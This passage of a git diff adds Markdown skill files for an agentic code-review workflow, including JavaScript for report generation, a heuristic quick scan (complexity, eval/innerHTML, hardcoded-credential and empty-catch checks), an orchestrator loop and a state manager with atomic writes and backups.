- [ ] 所有维度已审查完成 (reviewed_dimensions.length === 6)
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
const context = state.context;
|
||||
const findings = state.findings;
|
||||
|
||||
// 1. 汇总所有发现
|
||||
const allFindings = [
|
||||
...findings.correctness,
|
||||
...findings.readability,
|
||||
...findings.performance,
|
||||
...findings.security,
|
||||
...findings.testing,
|
||||
...findings.architecture
|
||||
];
|
||||
|
||||
// 2. 按严重程度排序
|
||||
const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
|
||||
allFindings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity]);
|
||||
|
||||
// 3. 统计
|
||||
const stats = {
|
||||
total_issues: allFindings.length,
|
||||
critical: allFindings.filter(f => f.severity === 'critical').length,
|
||||
high: allFindings.filter(f => f.severity === 'high').length,
|
||||
medium: allFindings.filter(f => f.severity === 'medium').length,
|
||||
low: allFindings.filter(f => f.severity === 'low').length,
|
||||
info: allFindings.filter(f => f.severity === 'info').length,
|
||||
by_dimension: {
|
||||
correctness: findings.correctness.length,
|
||||
readability: findings.readability.length,
|
||||
performance: findings.performance.length,
|
||||
security: findings.security.length,
|
||||
testing: findings.testing.length,
|
||||
architecture: findings.architecture.length
|
||||
}
|
||||
};
|
||||
|
||||
// 4. 生成报告
|
||||
const report = generateMarkdownReport(context, stats, allFindings, state.scan_summary);
|
||||
|
||||
// 5. 保存报告
|
||||
const reportPath = `${workDir}/review-report.md`;
|
||||
Write(reportPath, report);
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
...stats,
|
||||
review_duration_ms: Date.now() - new Date(state.started_at).getTime()
|
||||
}
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
function generateMarkdownReport(context, stats, findings, scanSummary) {
|
||||
const severityEmoji = {
|
||||
critical: '🔴',
|
||||
high: '🟠',
|
||||
medium: '🟡',
|
||||
low: '🔵',
|
||||
info: '⚪'
|
||||
};
|
||||
|
||||
let report = `# Code Review Report
|
||||
|
||||
## 审查概览
|
||||
|
||||
| 项目 | 值 |
|
||||
|------|------|
|
||||
| 目标路径 | \`${context.target_path}\` |
|
||||
| 文件数量 | ${context.file_count} |
|
||||
| 代码行数 | ${context.total_lines} |
|
||||
| 主要语言 | ${context.language} |
|
||||
| 框架 | ${context.framework || 'N/A'} |
|
||||
|
||||
## 问题统计
|
||||
|
||||
| 严重程度 | 数量 |
|
||||
|----------|------|
|
||||
| 🔴 Critical | ${stats.critical} |
|
||||
| 🟠 High | ${stats.high} |
|
||||
| 🟡 Medium | ${stats.medium} |
|
||||
| 🔵 Low | ${stats.low} |
|
||||
| ⚪ Info | ${stats.info} |
|
||||
| **总计** | **${stats.total_issues}** |
|
||||
|
||||
### 按维度统计
|
||||
|
||||
| 维度 | 问题数 |
|
||||
|------|--------|
|
||||
| Correctness (正确性) | ${stats.by_dimension.correctness} |
|
||||
| Security (安全性) | ${stats.by_dimension.security} |
|
||||
| Performance (性能) | ${stats.by_dimension.performance} |
|
||||
| Readability (可读性) | ${stats.by_dimension.readability} |
|
||||
| Testing (测试) | ${stats.by_dimension.testing} |
|
||||
| Architecture (架构) | ${stats.by_dimension.architecture} |
|
||||
|
||||
---
|
||||
|
||||
## 高风险区域
|
||||
|
||||
`;
|
||||
|
||||
if (scanSummary?.risk_areas?.length > 0) {
|
||||
report += `| 文件 | 原因 | 优先级 |
|
||||
|------|------|--------|
|
||||
`;
|
||||
for (const area of scanSummary.risk_areas.slice(0, 10)) {
|
||||
report += `| \`${area.file}\` | ${area.reason} | ${area.priority} |\n`;
|
||||
}
|
||||
} else {
|
||||
report += `未发现明显的高风险区域。\n`;
|
||||
}
|
||||
|
||||
report += `
|
||||
---
|
||||
|
||||
## 问题详情
|
||||
|
||||
`;
|
||||
|
||||
// 按维度分组输出
|
||||
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
|
||||
const dimensionNames = {
|
||||
correctness: '正确性 (Correctness)',
|
||||
security: '安全性 (Security)',
|
||||
performance: '性能 (Performance)',
|
||||
readability: '可读性 (Readability)',
|
||||
testing: '测试 (Testing)',
|
||||
architecture: '架构 (Architecture)'
|
||||
};
|
||||
|
||||
for (const dim of dimensions) {
|
||||
const dimFindings = findings.filter(f => f.dimension === dim);
|
||||
if (dimFindings.length === 0) continue;
|
||||
|
||||
report += `### ${dimensionNames[dim]}
|
||||
|
||||
`;
|
||||
|
||||
for (const finding of dimFindings) {
|
||||
report += `#### ${severityEmoji[finding.severity]} [${finding.id}] ${finding.category}
|
||||
|
||||
- **严重程度**: ${finding.severity.toUpperCase()}
|
||||
- **文件**: \`${finding.file}\`${finding.line ? `:${finding.line}` : ''}
|
||||
- **描述**: ${finding.description}
|
||||
`;
|
||||
|
||||
if (finding.code_snippet) {
|
||||
report += `
|
||||
\`\`\`
|
||||
${finding.code_snippet}
|
||||
\`\`\`
|
||||
`;
|
||||
}
|
||||
|
||||
report += `
|
||||
**建议**: ${finding.recommendation}
|
||||
`;
|
||||
|
||||
if (finding.fix_example) {
|
||||
report += `
|
||||
**修复示例**:
|
||||
\`\`\`
|
||||
${finding.fix_example}
|
||||
\`\`\`
|
||||
`;
|
||||
}
|
||||
|
||||
report += `
|
||||
---
|
||||
|
||||
`;
|
||||
}
|
||||
}
|
||||
|
||||
report += `
|
||||
## 审查建议
|
||||
|
||||
### 必须修复 (Must Fix)
|
||||
|
||||
${stats.critical + stats.high > 0
|
||||
? `发现 ${stats.critical} 个严重问题和 ${stats.high} 个高优先级问题,建议在合并前修复。`
|
||||
: '未发现必须立即修复的问题。'}
|
||||
|
||||
### 建议改进 (Should Fix)
|
||||
|
||||
${stats.medium > 0
|
||||
? `发现 ${stats.medium} 个中等优先级问题,建议在后续迭代中改进。`
|
||||
: '代码质量良好,无明显需要改进的地方。'}
|
||||
|
||||
### 可选优化 (Nice to Have)
|
||||
|
||||
${stats.low + stats.info > 0
|
||||
? `发现 ${stats.low + stats.info} 个低优先级建议,可根据团队规范酌情处理。`
|
||||
: '无额外建议。'}
|
||||
|
||||
---
|
||||
|
||||
*报告生成时间: ${new Date().toISOString()}*
|
||||
`;
|
||||
|
||||
return report;
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
total_issues: totalCount,
|
||||
critical: criticalCount,
|
||||
high: highCount,
|
||||
medium: mediumCount,
|
||||
low: lowCount,
|
||||
info: infoCount,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `review-report.md`
|
||||
- **Location**: `${workDir}/review-report.md`
|
||||
- **Format**: Markdown
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 写入失败 | 尝试备用位置 |
|
||||
| 模板错误 | 使用简化格式 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-complete
|
||||
164
.claude/skills/review-code/phases/actions/action-quick-scan.md
Normal file
164
.claude/skills/review-code/phases/actions/action-quick-scan.md
Normal file
@@ -0,0 +1,164 @@
|
||||
# Action: Quick Scan
|
||||
|
||||
快速扫描代码,识别高风险区域。
|
||||
|
||||
## Purpose
|
||||
|
||||
进行第一遍快速扫描:
|
||||
- 识别复杂度高的文件
|
||||
- 标记潜在的高风险区域
|
||||
- 发现明显的问题模式
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.context !== null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
const context = state.context;
|
||||
const riskAreas = [];
|
||||
const quickIssues = [];
|
||||
|
||||
// 1. 扫描每个文件
|
||||
for (const file of context.files) {
|
||||
try {
|
||||
const content = Read(file);
|
||||
const lines = content.split('\n');
|
||||
|
||||
// --- 复杂度检查 ---
|
||||
const functionMatches = content.match(/function\s+\w+|=>\s*{|async\s+\w+/g) || [];
|
||||
const nestingDepth = Math.max(...lines.map(l => (l.match(/^\s*/)?.[0].length || 0) / 2));
|
||||
|
||||
if (lines.length > 500 || functionMatches.length > 20 || nestingDepth > 8) {
|
||||
riskAreas.push({
|
||||
file: file,
|
||||
reason: `High complexity: ${lines.length} lines, ${functionMatches.length} functions, depth ${nestingDepth}`,
|
||||
priority: 'high'
|
||||
});
|
||||
}
|
||||
|
||||
// --- 快速问题检测 ---
|
||||
|
||||
// 安全问题快速检测
|
||||
if (content.includes('eval(') || content.includes('innerHTML')) {
|
||||
quickIssues.push({
|
||||
type: 'security',
|
||||
file: file,
|
||||
message: 'Potential XSS/injection risk: eval() or innerHTML usage'
|
||||
});
|
||||
}
|
||||
|
||||
// 硬编码密钥检测
|
||||
if (/(?:password|secret|api_key|token)\s*[=:]\s*['"][^'"]{8,}/i.test(content)) {
|
||||
quickIssues.push({
|
||||
type: 'security',
|
||||
file: file,
|
||||
message: 'Potential hardcoded credential detected'
|
||||
});
|
||||
}
|
||||
|
||||
// TODO/FIXME 检测
|
||||
const todoCount = (content.match(/TODO|FIXME|HACK|XXX/gi) || []).length;
|
||||
if (todoCount > 5) {
|
||||
quickIssues.push({
|
||||
type: 'maintenance',
|
||||
file: file,
|
||||
message: `${todoCount} TODO/FIXME comments found`
|
||||
});
|
||||
}
|
||||
|
||||
// console.log 检测(生产代码)
|
||||
if (!file.includes('test') && !file.includes('spec')) {
|
||||
const consoleCount = (content.match(/console\.(log|debug|info)/g) || []).length;
|
||||
if (consoleCount > 3) {
|
||||
quickIssues.push({
|
||||
type: 'readability',
|
||||
file: file,
|
||||
message: `${consoleCount} console statements (should be removed in production)`
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// 长函数检测
|
||||
const longFunctions = content.match(/function[^{]+\{[^}]{2000,}\}/g) || [];
|
||||
if (longFunctions.length > 0) {
|
||||
quickIssues.push({
|
||||
type: 'readability',
|
||||
file: file,
|
||||
message: `${longFunctions.length} long function(s) detected (>50 lines)`
|
||||
});
|
||||
}
|
||||
|
||||
// 错误处理检测
|
||||
if (content.includes('catch') && content.includes('catch (') && content.match(/catch\s*\([^)]*\)\s*{\s*}/)) {
|
||||
quickIssues.push({
|
||||
type: 'correctness',
|
||||
file: file,
|
||||
message: 'Empty catch block detected'
|
||||
});
|
||||
}
|
||||
|
||||
} catch (e) {
|
||||
// 跳过无法读取的文件
|
||||
}
|
||||
}
|
||||
|
||||
// 2. 计算复杂度评分
|
||||
const complexityScore = Math.min(100, Math.round(
|
||||
(riskAreas.length * 10 + quickIssues.length * 5) / context.file_count * 100
|
||||
));
|
||||
|
||||
// 3. 构建扫描摘要
|
||||
const scanSummary = {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: complexityScore,
|
||||
quick_issues: quickIssues
|
||||
};
|
||||
|
||||
// 4. 保存扫描结果
|
||||
Write(`${workDir}/scan-summary.json`, JSON.stringify(scanSummary, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: scanSummary
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: score,
|
||||
quick_issues: quickIssues
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `scan-summary.json`
|
||||
- **Location**: `${workDir}/scan-summary.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,继续扫描 |
|
||||
| 编码问题 | 以二进制跳过 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-deep-review (开始逐维度审查)
|
||||
- 风险区域过多 (>20): 可询问用户是否缩小范围
|
||||
251
.claude/skills/review-code/phases/orchestrator.md
Normal file
251
.claude/skills/review-code/phases/orchestrator.md
Normal file
@@ -0,0 +1,251 @@
|
||||
# Orchestrator
|
||||
|
||||
根据当前状态选择并执行下一个审查动作。
|
||||
|
||||
## Role
|
||||
|
||||
Code Review 编排器,负责:
|
||||
1. 读取当前审查状态
|
||||
2. 根据状态选择下一个动作
|
||||
3. 执行动作并更新状态
|
||||
4. 循环直到审查完成
|
||||
|
||||
## Dependencies
|
||||
|
||||
- **State Manager**: [state-manager.md](./state-manager.md) - 提供原子化状态操作、自动备份、验证和回滚功能
|
||||
|
||||
## State Management
|
||||
|
||||
本模块使用 StateManager 进行所有状态操作,确保:
|
||||
- **原子更新** - 写入临时文件后重命名,防止损坏
|
||||
- **自动备份** - 每次更新前自动创建备份
|
||||
- **回滚能力** - 失败时可从备份恢复
|
||||
- **结构验证** - 确保状态结构完整性
|
||||
|
||||
### StateManager API (from state-manager.md)
|
||||
|
||||
```javascript
|
||||
// 初始化状态
|
||||
StateManager.initState(workDir)
|
||||
|
||||
// 读取当前状态
|
||||
StateManager.getState(workDir)
|
||||
|
||||
// 更新状态(原子操作,自动备份)
|
||||
StateManager.updateState(workDir, updates)
|
||||
|
||||
// 获取下一个待审查维度
|
||||
StateManager.getNextDimension(state)
|
||||
|
||||
// 标记维度完成
|
||||
StateManager.markDimensionComplete(workDir, dimension)
|
||||
|
||||
// 记录错误
|
||||
StateManager.recordError(workDir, action, message)
|
||||
|
||||
// 从备份恢复
|
||||
StateManager.restoreState(workDir)
|
||||
```
|
||||
|
||||
## Decision Logic
|
||||
|
||||
```javascript
|
||||
function selectNextAction(state) {
|
||||
// 1. 终止条件检查
|
||||
if (state.status === 'completed') return null;
|
||||
if (state.status === 'user_exit') return null;
|
||||
if (state.error_count >= 3) return 'action-abort';
|
||||
|
||||
// 2. 初始化阶段
|
||||
if (state.status === 'pending' || !state.context) {
|
||||
return 'action-collect-context';
|
||||
}
|
||||
|
||||
// 3. 快速扫描阶段
|
||||
if (!state.scan_completed) {
|
||||
return 'action-quick-scan';
|
||||
}
|
||||
|
||||
// 4. 深入审查阶段 - 使用 StateManager 获取下一个维度
|
||||
const nextDimension = StateManager.getNextDimension(state);
|
||||
if (nextDimension) {
|
||||
return 'action-deep-review'; // 传递 dimension 参数
|
||||
}
|
||||
|
||||
// 5. 报告生成阶段
|
||||
if (!state.report_generated) {
|
||||
return 'action-generate-report';
|
||||
}
|
||||
|
||||
// 6. 完成
|
||||
return 'action-complete';
|
||||
}
|
||||
```
|
||||
|
||||
## Execution Loop
|
||||
|
||||
```javascript
|
||||
async function runOrchestrator() {
|
||||
console.log('=== Code Review Orchestrator Started ===');
|
||||
|
||||
let iteration = 0;
|
||||
const MAX_ITERATIONS = 20; // 6 dimensions + overhead
|
||||
|
||||
// 初始化状态(如果尚未初始化)
|
||||
let state = StateManager.getState(workDir);
|
||||
if (!state) {
|
||||
state = StateManager.initState(workDir);
|
||||
}
|
||||
|
||||
while (iteration < MAX_ITERATIONS) {
|
||||
iteration++;
|
||||
|
||||
// 1. 读取当前状态(使用 StateManager)
|
||||
state = StateManager.getState(workDir);
|
||||
if (!state) {
|
||||
console.error('[Orchestrator] Failed to read state, attempting recovery...');
|
||||
state = StateManager.restoreState(workDir);
|
||||
if (!state) {
|
||||
console.error('[Orchestrator] Recovery failed, aborting.');
|
||||
break;
|
||||
}
|
||||
}
|
||||
console.log(`[Iteration ${iteration}] Status: ${state.status}`);
|
||||
|
||||
// 2. 选择下一个动作
|
||||
const actionId = selectNextAction(state);
|
||||
|
||||
if (!actionId) {
|
||||
console.log('Review completed, terminating.');
|
||||
break;
|
||||
}
|
||||
|
||||
console.log(`[Iteration ${iteration}] Executing: ${actionId}`);
|
||||
|
||||
// 3. 更新状态:当前动作(使用 StateManager)
|
||||
StateManager.updateState(workDir, { current_action: actionId });
|
||||
|
||||
// 4. 执行动作
|
||||
try {
|
||||
const actionPrompt = Read(`phases/actions/${actionId}.md`);
|
||||
|
||||
// 确定当前需要审查的维度(使用 StateManager)
|
||||
const currentDimension = StateManager.getNextDimension(state);
|
||||
|
||||
const result = await Task({
|
||||
subagent_type: 'universal-executor',
|
||||
run_in_background: false,
|
||||
prompt: `
|
||||
[WORK_DIR]
|
||||
${workDir}
|
||||
|
||||
[STATE]
|
||||
${JSON.stringify(state, null, 2)}
|
||||
|
||||
[CURRENT_DIMENSION]
|
||||
${currentDimension || 'N/A'}
|
||||
|
||||
[ACTION]
|
||||
${actionPrompt}
|
||||
|
||||
[SPECS]
|
||||
Review Dimensions: specs/review-dimensions.md
|
||||
Issue Classification: specs/issue-classification.md
|
||||
|
||||
[RETURN]
|
||||
Return JSON with stateUpdates field containing updates to apply to state.
|
||||
`
|
||||
});
|
||||
|
||||
const actionResult = JSON.parse(result);
|
||||
|
||||
// 5. 更新状态:动作完成(使用 StateManager)
|
||||
StateManager.updateState(workDir, {
|
||||
current_action: null,
|
||||
completed_actions: [...(state.completed_actions || []), actionId],
|
||||
...actionResult.stateUpdates
|
||||
});
|
||||
|
||||
// 如果是深入审查动作,标记维度完成
|
||||
if (actionId === 'action-deep-review' && currentDimension) {
|
||||
StateManager.markDimensionComplete(workDir, currentDimension);
|
||||
}
|
||||
|
||||
} catch (error) {
|
||||
// 错误处理(使用 StateManager.recordError)
|
||||
console.error(`[Orchestrator] Action failed: ${error.message}`);
|
||||
StateManager.recordError(workDir, actionId, error.message);
|
||||
|
||||
// 清除当前动作
|
||||
StateManager.updateState(workDir, { current_action: null });
|
||||
|
||||
// 检查是否需要恢复状态
|
||||
const updatedState = StateManager.getState(workDir);
|
||||
if (updatedState && updatedState.error_count >= 3) {
|
||||
console.error('[Orchestrator] Too many errors, attempting state recovery...');
|
||||
StateManager.restoreState(workDir);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
console.log('=== Code Review Orchestrator Finished ===');
|
||||
}
|
||||
```
|
||||
|
||||
## Action Catalog
|
||||
|
||||
| Action | Purpose | Preconditions |
|
||||
|--------|---------|---------------|
|
||||
| [action-collect-context](actions/action-collect-context.md) | 收集审查目标上下文 | status === 'pending' |
|
||||
| [action-quick-scan](actions/action-quick-scan.md) | 快速扫描识别风险区域 | context !== null |
|
||||
| [action-deep-review](actions/action-deep-review.md) | 深入审查指定维度 | scan_completed === true |
|
||||
| [action-generate-report](actions/action-generate-report.md) | 生成结构化审查报告 | all dimensions reviewed |
|
||||
| [action-complete](actions/action-complete.md) | 完成审查,保存结果 | report_generated === true |
|
||||
|
||||
## Termination Conditions
|
||||
|
||||
- `state.status === 'completed'` - 审查正常完成
|
||||
- `state.status === 'user_exit'` - 用户主动退出
|
||||
- `state.error_count >= 3` - 错误次数超限(由 StateManager.recordError 自动处理)
|
||||
- `iteration >= MAX_ITERATIONS` - 迭代次数超限
|
||||
|
||||
## Error Recovery
|
||||
|
||||
本模块利用 StateManager 提供的错误恢复机制:
|
||||
|
||||
| Error Type | Recovery Strategy | StateManager Function |
|
||||
|------------|-------------------|----------------------|
|
||||
| 状态读取失败 | 从备份恢复 | `restoreState(workDir)` |
|
||||
| 动作执行失败 | 记录错误,累计超限后自动失败 | `recordError(workDir, action, message)` |
|
||||
| 状态不一致 | 验证并恢复 | `getState()` 内置验证 |
|
||||
| 用户中止 | 保存当前进度 | `updateState(workDir, { status: 'user_exit' })` |
|
||||
|
||||
### 错误处理流程
|
||||
|
||||
```
|
||||
1. 动作执行失败
|
||||
|
|
||||
2. StateManager.recordError() 记录错误
|
||||
|
|
||||
3. 检查 error_count
|
||||
|
|
||||
+-- < 3: 继续下一次迭代
|
||||
+-- >= 3: StateManager 自动设置 status='failed'
|
||||
|
|
||||
Orchestrator 检测到 status 变化
|
||||
|
|
||||
尝试 restoreState() 恢复到上一个稳定状态
|
||||
```
|
||||
|
||||
### 状态备份时机
|
||||
|
||||
StateManager 在以下时机自动创建备份:
|
||||
- 每次 `updateState()` 调用前
|
||||
- 可通过 `backupState(workDir, suffix)` 手动创建命名备份
|
||||
|
||||
### 历史追踪
|
||||
|
||||
所有状态变更记录在 `state-history.json`,便于调试和审计:
|
||||
- 初始化事件
|
||||
- 每次更新的字段变更
|
||||
- 恢复操作记录
|
||||
752
.claude/skills/review-code/phases/state-manager.md
Normal file
752
.claude/skills/review-code/phases/state-manager.md
Normal file
@@ -0,0 +1,752 @@
|
||||
# State Manager
|
||||
|
||||
Centralized state management module for Code Review workflow. Provides atomic operations, automatic backups, validation, and rollback capabilities.
|
||||
|
||||
## Overview
|
||||
|
||||
This module solves the fragile state management problem by providing:
|
||||
- **Atomic updates** - Write to temp file, then rename (prevents corruption)
|
||||
- **Automatic backups** - Every update creates a backup first
|
||||
- **Rollback capability** - Restore from backup on failure
|
||||
- **Schema validation** - Ensure state structure integrity
|
||||
- **Change history** - Track all state modifications
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
{workDir}/
|
||||
state.json # Current state
|
||||
state.backup.json # Latest backup
|
||||
state-history.json # Change history log
|
||||
```
|
||||
|
||||
## API Reference
|
||||
|
||||
### initState(workDir)
|
||||
|
||||
Initialize a new state file with default values.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Initialize state file with default structure
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object} - Initial state object
|
||||
*/
|
||||
function initState(workDir) {
|
||||
const now = new Date().toISOString();
|
||||
|
||||
const initialState = {
|
||||
status: 'pending',
|
||||
started_at: now,
|
||||
updated_at: now,
|
||||
context: null,
|
||||
scan_completed: false,
|
||||
scan_summary: null,
|
||||
reviewed_dimensions: [],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
correctness: [],
|
||||
readability: [],
|
||||
performance: [],
|
||||
security: [],
|
||||
testing: [],
|
||||
architecture: []
|
||||
},
|
||||
report_generated: false,
|
||||
report_path: null,
|
||||
current_action: null,
|
||||
completed_actions: [],
|
||||
errors: [],
|
||||
error_count: 0,
|
||||
summary: null
|
||||
};
|
||||
|
||||
// Write state file
|
||||
const statePath = `${workDir}/state.json`;
|
||||
Write(statePath, JSON.stringify(initialState, null, 2));
|
||||
|
||||
// Initialize history log
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
const historyEntry = {
|
||||
entries: [{
|
||||
timestamp: now,
|
||||
action: 'init',
|
||||
changes: { type: 'initialize', status: 'pending' }
|
||||
}]
|
||||
};
|
||||
Write(historyPath, JSON.stringify(historyEntry, null, 2));
|
||||
|
||||
console.log(`[StateManager] Initialized state at ${statePath}`);
|
||||
return initialState;
|
||||
}
|
||||
```
|
||||
|
||||
### getState(workDir)
|
||||
|
||||
Read and parse current state from file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Read current state from file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object|null} - Current state or null if not found
|
||||
*/
|
||||
function getState(workDir) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
|
||||
try {
|
||||
const content = Read(statePath);
|
||||
const state = JSON.parse(content);
|
||||
|
||||
// Validate structure before returning
|
||||
const validation = validateState(state);
|
||||
if (!validation.valid) {
|
||||
console.warn(`[StateManager] State validation warnings: ${validation.warnings.join(', ')}`);
|
||||
}
|
||||
|
||||
return state;
|
||||
} catch (error) {
|
||||
console.error(`[StateManager] Failed to read state: ${error.message}`);
|
||||
return null;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### updateState(workDir, updates)
|
||||
|
||||
Safely update state with atomic write and automatic backup.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Safely update state with atomic write
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} updates - Partial state updates to apply
|
||||
* @returns {object} - Updated state object
|
||||
* @throws {Error} - If update fails (automatically rolls back)
|
||||
*/
|
||||
function updateState(workDir, updates) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const tempPath = `${workDir}/state.tmp.json`;
|
||||
const backupPath = `${workDir}/state.backup.json`;
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
|
||||
// Step 1: Read current state
|
||||
let currentState;
|
||||
try {
|
||||
currentState = JSON.parse(Read(statePath));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot read current state: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 2: Create backup before any modification
|
||||
try {
|
||||
Write(backupPath, JSON.stringify(currentState, null, 2));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot create backup: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 3: Merge updates
|
||||
const now = new Date().toISOString();
|
||||
const newState = deepMerge(currentState, {
|
||||
...updates,
|
||||
updated_at: now
|
||||
});
|
||||
|
||||
// Step 4: Validate new state
|
||||
const validation = validateState(newState);
|
||||
if (!validation.valid && validation.errors.length > 0) {
|
||||
throw new Error(`Invalid state after update: ${validation.errors.join(', ')}`);
|
||||
}
|
||||
|
||||
// Step 5: Write to temp file first (atomic preparation)
|
||||
try {
|
||||
Write(tempPath, JSON.stringify(newState, null, 2));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot write temp state: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 6: Atomic rename (replace original with temp)
|
||||
try {
|
||||
// Read temp and write to original (simulating atomic rename)
|
||||
const tempContent = Read(tempPath);
|
||||
Write(statePath, tempContent);
|
||||
|
||||
// Clean up temp file
|
||||
Bash(`rm -f "${tempPath}"`);
|
||||
} catch (error) {
|
||||
// Rollback: restore from backup
|
||||
console.error(`[StateManager] Update failed, rolling back: ${error.message}`);
|
||||
try {
|
||||
const backup = Read(backupPath);
|
||||
Write(statePath, backup);
|
||||
} catch (rollbackError) {
|
||||
throw new Error(`Critical: Update failed and rollback failed: ${rollbackError.message}`);
|
||||
}
|
||||
throw new Error(`Update failed, rolled back: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 7: Record in history
|
||||
try {
|
||||
let history = { entries: [] };
|
||||
try {
|
||||
history = JSON.parse(Read(historyPath));
|
||||
} catch (e) {
|
||||
// History file may not exist, start fresh
|
||||
}
|
||||
|
||||
history.entries.push({
|
||||
timestamp: now,
|
||||
action: 'update',
|
||||
changes: summarizeChanges(currentState, newState, updates)
|
||||
});
|
||||
|
||||
// Keep only last 100 entries
|
||||
if (history.entries.length > 100) {
|
||||
history.entries = history.entries.slice(-100);
|
||||
}
|
||||
|
||||
Write(historyPath, JSON.stringify(history, null, 2));
|
||||
} catch (error) {
|
||||
// History logging failure is non-critical
|
||||
console.warn(`[StateManager] Failed to log history: ${error.message}`);
|
||||
}
|
||||
|
||||
console.log(`[StateManager] State updated successfully`);
|
||||
return newState;
|
||||
}
|
||||
|
||||
/**
|
||||
* Deep merge helper - merges nested objects
|
||||
*/
|
||||
function deepMerge(target, source) {
|
||||
const result = { ...target };
|
||||
|
||||
for (const key of Object.keys(source)) {
|
||||
if (source[key] === null || source[key] === undefined) {
|
||||
result[key] = source[key];
|
||||
} else if (Array.isArray(source[key])) {
|
||||
result[key] = source[key];
|
||||
} else if (typeof source[key] === 'object' && typeof target[key] === 'object') {
|
||||
result[key] = deepMerge(target[key], source[key]);
|
||||
} else {
|
||||
result[key] = source[key];
|
||||
}
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
/**
|
||||
* Summarize changes for history logging
|
||||
*/
|
||||
function summarizeChanges(oldState, newState, updates) {
|
||||
const changes = {};
|
||||
|
||||
for (const key of Object.keys(updates)) {
|
||||
if (key === 'updated_at') continue;
|
||||
|
||||
const oldVal = oldState[key];
|
||||
const newVal = newState[key];
|
||||
|
||||
if (JSON.stringify(oldVal) !== JSON.stringify(newVal)) {
|
||||
changes[key] = {
|
||||
from: typeof oldVal === 'object' ? '[object]' : oldVal,
|
||||
to: typeof newVal === 'object' ? '[object]' : newVal
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
return changes;
|
||||
}
|
||||
```
|
||||
|
||||
### validateState(state)
|
||||
|
||||
Validate state structure against schema.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Validate state structure
|
||||
* @param {object} state - State object to validate
|
||||
* @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
|
||||
*/
|
||||
function validateState(state) {
|
||||
const errors = [];
|
||||
const warnings = [];
|
||||
|
||||
// Required fields
|
||||
const requiredFields = ['status', 'started_at', 'updated_at'];
|
||||
for (const field of requiredFields) {
|
||||
if (state[field] === undefined) {
|
||||
errors.push(`Missing required field: ${field}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Status validation
|
||||
const validStatuses = ['pending', 'running', 'completed', 'failed', 'user_exit'];
|
||||
if (state.status && !validStatuses.includes(state.status)) {
|
||||
errors.push(`Invalid status: ${state.status}. Must be one of: ${validStatuses.join(', ')}`);
|
||||
}
|
||||
|
||||
// Timestamp format validation
|
||||
const timestampFields = ['started_at', 'updated_at', 'completed_at'];
|
||||
for (const field of timestampFields) {
|
||||
if (state[field] && !isValidISOTimestamp(state[field])) {
|
||||
warnings.push(`Invalid timestamp format for ${field}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Findings structure validation
|
||||
if (state.findings) {
|
||||
const expectedDimensions = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];
|
||||
for (const dim of expectedDimensions) {
|
||||
if (!Array.isArray(state.findings[dim])) {
|
||||
warnings.push(`findings.${dim} should be an array`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Context validation (when present)
|
||||
if (state.context !== null && state.context !== undefined) {
|
||||
const contextFields = ['target_path', 'files', 'language', 'total_lines', 'file_count'];
|
||||
